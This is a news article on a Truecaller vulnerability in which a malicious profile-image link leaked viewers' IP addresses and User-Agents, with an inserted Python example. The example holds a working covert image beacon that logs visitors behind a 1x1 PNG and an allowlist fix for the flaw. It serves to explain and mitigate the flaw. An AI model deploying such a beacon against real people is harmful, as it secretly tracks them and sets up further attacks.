Security researcher Ehraz Ahmed discovered a vulnerability in Truecaller, a popular mobile caller-identification and call-blocking application. Exploiting it allows an attacker to obtain user data, including information about the user's device and location.
The researcher also published proof-of-concept (PoC) code showing that a "malicious link" could be set as a profile image. Because the app fetches that link whenever the profile is displayed, an attacker could use it to collect the IP addresses of other Truecaller users and then target them with further attacks.
“Whenever the user views the attacker’s profile on Truecaller, either by doing a search or a popup from a call, the custom script gets executed, and the user’s IP gets recorded. And for the user viewing the profile, he won’t notice any difference as the output of this custom script displays an image, so for the user, it will look like any other Truecaller profile”, reports Ehraz Ahmed.
Truecaller is a smartphone application offering caller identification, call blocking, flash messaging, call recording, and internet-based chat and voice calls. Registering with the service requires a standard cellular mobile number.
The platform is available worldwide but is especially popular in India; it has more than 500 million downloads and 150 million daily active users.
By exploiting the vulnerability, Ahmed was able to obtain user information such as the IP address and User-Agent string. The attack runs in the background, without the user's knowledge.
“Having a user’s IP address, the hacker can carry out attacks such as DDoS and brute force, and can also scan open ports for future use”, writes Ehraz Ahmed.
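The leak mechanism described above, as an added example that is not part of the original article, the researcher's PoC, or Truecaller's code: a tiny WSGI endpoint standing in for the attacker's "custom script" records the viewer's IP address and User-Agent and then answers with a real 1x1 PNG, so the client renders what looks like an ordinary avatar. Alongside it is the server-side check a service can apply to close the hole: only accept profile-image URLs on its own image host (or re-host anything else there), so no user-controlled origin is ever contacted by other users' phones. The hostnames, the `ALLOWED_IMAGE_HOSTS` allowlist and the sample requests are hypothetical, constructed for this example.

```python
"""Added example: attacker-side image beacon and the first-party-URL
check that defeats it. Not Truecaller's code or the researcher's PoC;
all hostnames and sample requests below are constructed."""
import struct
import zlib
from urllib.parse import urlsplit


def png_1x1() -> bytes:
    """Build a valid 1x1 transparent RGBA PNG from scratch."""
    def chunk(tag: bytes, data: bytes) -> bytes:
        crc = zlib.crc32(tag + data) & 0xFFFFFFFF
        return struct.pack(">I", len(data)) + tag + data + struct.pack(">I", crc)

    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 6, 0, 0, 0)  # 1x1, 8-bit, RGBA
    raw = b"\x00" + b"\x00\x00\x00\x00"                  # filter byte + 1 pixel
    return (b"\x89PNG\r\n\x1a\n"
            + chunk(b"IHDR", ihdr)
            + chunk(b"IDAT", zlib.compress(raw))
            + chunk(b"IEND", b""))


ONE_BY_ONE_PNG = png_1x1()

# Everything the attacker's server learns about each viewer of the profile.
seen_viewers = []


def leak_app(environ, start_response):
    """WSGI app playing the attacker's image endpoint.

    Records the client IP and User-Agent, then serves a normal image so the
    viewer sees nothing unusual. If the script is hosted behind a reverse
    proxy, the real client IP arrives in X-Forwarded-For; otherwise it is the
    TCP peer address (REMOTE_ADDR).
    """
    forwarded = environ.get("HTTP_X_FORWARDED_FOR", "")
    ip = (forwarded or environ.get("REMOTE_ADDR", "")).split(",")[0].strip()
    ua = environ.get("HTTP_USER_AGENT", "")
    seen_viewers.append({"ip": ip, "user_agent": ua})
    start_response("200 OK", [("Content-Type", "image/png"),
                              ("Content-Length", str(len(ONE_BY_ONE_PNG)))])
    return [ONE_BY_ONE_PNG]


def call_app(app, environ):
    """Minimal WSGI driver for testing: returns (status, headers, body)."""
    captured = {}

    def start_response(status, headers, exc_info=None):
        captured["status"] = status
        captured["headers"] = headers

    body = b"".join(app(environ, start_response))
    return captured["status"], captured["headers"], body


# Hypothetical first-party CDN; in a real service this is the only origin
# other users' clients should ever fetch profile images from.
ALLOWED_IMAGE_HOSTS = {"images.example-cdn.invalid"}


def is_first_party_image_url(url: str) -> bool:
    """Mitigation: accept a stored profile-image URL only if it is https and
    hosted on the service's own image host. Anything else must be downloaded
    server-side and re-hosted there before being saved to the profile."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False
    if parts.username or parts.password:   # rejects https://cdn@attacker/ tricks
        return False
    host = (parts.hostname or "").lower()
    return host in ALLOWED_IMAGE_HOSTS


if __name__ == "__main__":
    # Run the beacon locally and point a browser at /avatar.png to see the
    # recorded IP/User-Agent pairs accumulate in seen_viewers.
    from wsgiref.simple_server import make_server
    with make_server("127.0.0.1", 8080, leak_app) as srv:
        print("image beacon listening on http://127.0.0.1:8080/avatar.png")
        srv.serve_forever()
```

The point of the allowlist check is that the rendering client never resolves an attacker-chosen hostname: the profile stores only a first-party URL, and the attacker's server sees at most the service's own fetcher, not every user who views the profile.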
Recall that this summer, due to a bug in an updated version, Truecaller signed users up for its payment service without their consent. The application did not ask users for permission before doing so; it only sent them text notifications about the registration.
Truecaller's developers confirmed the problem and promptly released a patch fixing the vulnerability. Users are encouraged to verify that their application has been updated to the latest version.